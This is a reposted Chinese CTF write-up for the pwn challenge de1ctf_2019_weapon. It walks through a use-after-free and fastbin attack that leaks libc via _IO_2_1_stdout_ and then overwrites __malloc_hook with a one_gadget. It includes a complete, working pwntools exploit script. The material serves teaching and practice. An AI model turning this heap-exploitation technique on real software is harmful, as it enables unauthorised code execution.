碼上快樂

相關內容    簡體    繁體

漲知識的一個pwn題:de1ctf_2019_weapon

本文轉載自   查看原文   2020-10-16 22:50   396    _IO_2_1_stdout_/ fastbin attack/ pwn/ uaf

沒做出來,wtcl,看了師傅們的wp才找到思路,收獲了很多

 

怎么說呢,這個題很簡單但是很巧妙,逆起來幾乎無難度

 

 

漏洞點位於free函數,一個簡單的UAF漏洞

 

然后接下來說說我一開始的思路

由於程序沒有提供show函數,所以幾乎可以確定要打_IO_2_1_stdout_,改掉flag然后泄漏libc

但是add函數里面只能申請小於0x60的chunk,根本找不到殘留的unsorted bin留下的指針

然后,然后我就找不到思路了

 

然后學習了一波師傅們的wp

其實這個除了UAF還有一個小漏洞,就是可以自己申請index,可以申請0-9號的任意index

這就為我們偽造unsorted bin留下了條件

 

思路,要想拿到unsorted bin的指針,首先我們需要一個0x60的fastbin,然后在相同的位置需要一個unsorted bin,這樣fastbin的fd pointer就留下了unsorted bin的fd pointer,就可以攻擊_IO_2_1_stdout_了

然后就是常規的hack __malloc_hook

 

仔細記錄一下中間過程

先來偽造一個header,目的:可以改下一個chunk的控制信息

 1 add(0x10,0,'aaaaaaaa')
 2 add(0x10,1,'bbbbbbbb')
 3 add(0x60,2,'cccccccc')
 4 add(0x10,3,'dddddddd')
 5         
 6 free(0)
 7 free(1)
 8 free(0)
 9         
10 add(0x10,0,p64(0) + p64(0x21))
11 add(0x60,8,'eeeeeeee')
12         
13 edit(1,'\x10')

 

這樣我們可以申請到010的位置,從而可以對020這個chunk的header 進行修改,可以先改成0x71,然后free一下,然后再改成一個unsorten bin大小的chunk,再free,這樣就有了殘留的堆指針

 

1 add(0x10,1,'aaaaaaaa')    
2 add(0x10,4,p64(0) + p64(0x71))
3 edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0
4 free(1)

 

編輯2號chunk的目的是繞過free時的檢查

 

接下來fast bin拿到unsorted bin的fd指針

1 edit(4,p64(0) + p64(0x91))    # to change the chunk size
2 free(1)    # now , fast fd has connected unsorted bin fd

 

 

然后就是常規思路了

申請到'\xdd\x*5'的位置,'*'需要爆破,1/16的概率,直接扔個try except

 

 

 

 

1 edit(1,'\xdd\x65')
2 edit(4,p64(0) + p64(0x71))    # don't forget to renew size
3 payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags
4 payload += p64(0) * 3 + '\x00' # make _IO_write_base smaller
5 add(0x60,5,'lemon')
6 add(0x60,6,payload

 

成功泄漏libc,后面就是常規的__malloc_hook - 0x23

 

 1 libc = ELF('./libc-2.23.so')
 2 _IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192
 3 libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']
 4 __malloc_hook = libc_base + libc.sym['__malloc_hook']
 5 one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
 6 one_gadget = libc_base + one_gadget_list[3]
 7 print "[*] one_gadget:",hex(one_gadget)
 8 add(0x60,5,'lemon')
 9 free(5)
10 payload = 0x13 * 'a' + p64(one_gadget)
11 edit(5,p64(__malloc_hook - 0x23))
12 add(0x60,5,'\x10')
13 add(0x60,0,payload)
14 add(0x20,3,'hack')
15 gdb.attach(p)
16 p.interactive()

 

完整exp:

  1 from pwn import *
  2 
  3 '''
  4 author: lemon
  5 date: 2020-10-16
  6 libc version: libc-2.23.so
  7 '''
  8 
  9 local = 1
 10 
 11 binary = "./de1ctf_2019_weapon"
 12 
 13 
 14 def dbg():
 15     context.log_level = 'debug'
 16 
 17 context.terminal = ['tmux','splitw','-h']
 18 
 19 
 20 def add(size,index,content):
 21     p.sendlineafter('choice >> ','1')
 22     p.sendlineafter('wlecome input your size of weapon: ',str(size))
 23     p.sendlineafter('input index:',str(index))
 24     p.sendafter('input your name:',content)
 25 
 26 def free(index):
 27     p.sendlineafter('choice >> ','2')
 28     p.sendlineafter('input idx :',str(index))
 29 
 30 def edit(index,content):
 31     p.sendlineafter('choice >>','3')
 32     p.sendlineafter('input idx:',str(index))
 33     p.sendafter('new content:',content)
 34 
 35 while True:
 36     try:
 37         if local == 1:
 38             p = process(binary)
 39         else:
 40             p = remote("node3.buuoj.cn",26759)
 41         add(0x10,0,'aaaaaaaa')
 42         add(0x10,1,'bbbbbbbb')
 43         add(0x60,2,'cccccccc')
 44         add(0x10,3,'dddddddd')
 45         
 46         free(0)
 47         free(1)
 48         free(0)
 49         
 50         add(0x10,0,p64(0) + p64(0x21))
 51         add(0x60,8,'eeeeeeee')
 52         
 53         edit(1,'\x10')
 54         
 55         add(0x10,1,'aaaaaaaa')    
 56         add(0x10,4,p64(0) + p64(0x71))
 57         
 58         edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0
 59         
 60         free(1)
 61         
 62         edit(4,p64(0) + p64(0x91))    # to change the chunk size
 63         free(1)    # now , fast fd has connected unsorted bin fd
 64 
 65         edit(1,'\xdd\x65')
 66         edit(4,p64(0) + p64(0x71))    # don't forget to renew size
 67         
 68         payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags
 69         payload += p64(0) * 3 + '\x00' # make _IO_write_base smaller
 70         
 71         add(0x60,5,'lemon')
 72         add(0x60,6,payload)
 73     
 74         
 75         libc = ELF('./libc-2.23.so')
 76         _IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192
 77         libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']
 78         
 79         __malloc_hook = libc_base + libc.sym['__malloc_hook']
 80         
 81         one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]
 82         one_gadget = libc_base + one_gadget_list[3]
 83         print "[*] one_gadget:",hex(one_gadget)
 84 
 85         add(0x60,5,'lemon')
 86         free(5)
 87 
 88         payload = 0x13 * 'a' + p64(one_gadget)
 89 
 90         edit(5,p64(__malloc_hook - 0x23))
 91         add(0x60,5,'\x10')
 92         add(0x60,0,payload)
 93 
 94         add(0x20,3,'hack')
 95 
 96         gdb.attach(p)
 97         p.interactive()
 98         break
 99     
100     except Exception as e:
101         print(e)
102         p.close()
103         continue

 

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 [De1CTF 2019]SSRF Me BUUCTF | [De1CTF 2019]SSRF Me 一個好玩的CTF題 刷題記錄:[De1CTF 2019]SSRF Me CTF中的PWN—(棧溢出) De1CTF 2020 部分web De1ctf - shell shell shell記錄 MIPS Pwn賽題學習 CTF-pwn-tips-zh_CN CTF-Pwn-[BJDCTF 2nd]diff
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM